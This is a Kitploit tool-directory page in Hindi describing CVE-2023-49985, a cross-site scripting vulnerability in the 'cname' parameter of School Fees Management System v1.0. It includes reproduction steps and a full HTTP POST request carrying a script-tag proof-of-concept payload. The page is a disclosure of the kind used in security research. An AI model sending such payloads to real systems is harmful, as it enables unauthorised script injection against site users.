Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-49985 — School Fees Management System v1.0 - "new_class" पर "cname" पैरामीटर में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता | Kitploit
उपकरण/GitHubGitHub/geraldoalcantara/cve-2023-49985
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubgeraldoalcantara/cve-2023-49985

CVE-2023-49985

School Fees Management System v1.0 - "new_class" पर "cname" पैरामीटर में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-49985

School Fees Management System v1.0 - "new_class" में "cname" पैरामीटर में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता

विवरण: School Fees Management System v1.0 के "new_class" घटक में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता, हमलावरों को cname पैरामीटर में इंजेक्ट किए गए क्राफ्टेड पेलोड के माध्यम से मनमाना वेब स्क्रिप्ट या HTML निष्पादित करने की अनुमति देती है।

संवेदनशील उत्पाद संस्करण: School Fees Management System v1.0
CVE लेखक: Geraldo Alcântara
दिनांक: 28/11/2023
पुष्टि की गई: 19/12/2023
CVE: CVE-2023-49985
परीक्षण किया गया: Windows

पुनरुत्पादन के चरण:

भेद्यता का शोषण करने के लिए, उपयुक्त अनुमतियों वाले उपयोगकर्ता को "/ci_fms/admin/management/class" पृष्ठ तक पहुँचना होगा। इस पृष्ठ पर, उपयोगकर्ता को या तो किसी मौजूदा कक्षा को संपादित करना होगा या एक नई कक्षा जोड़नी होगी। इस प्रक्रिया के दौरान दुर्भावनापूर्ण पेलोड को "cname" पैरामीटर में डाला जाना आवश्यक है।

अनुरोध:

root@kitploit:~
POST /ci_fms/admin/action/new_class HTTP/1.1
Host: 192.168.68.148
Content-Length: 273
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAbJT9XS9eFLU53MR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/management/class
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=gdoj5tr7rsf7ci5o9rpr0rh5eni2r6an
Connection: close

------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cname"

<script>alert(document.domain)</script>
------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cfees"

12,000
------WebKitFormBoundaryAbJT9XS9eFLU53MR--

खोजकर्ता/श्रेय:
Geraldo Alcântara

टूल डाउनलोड करें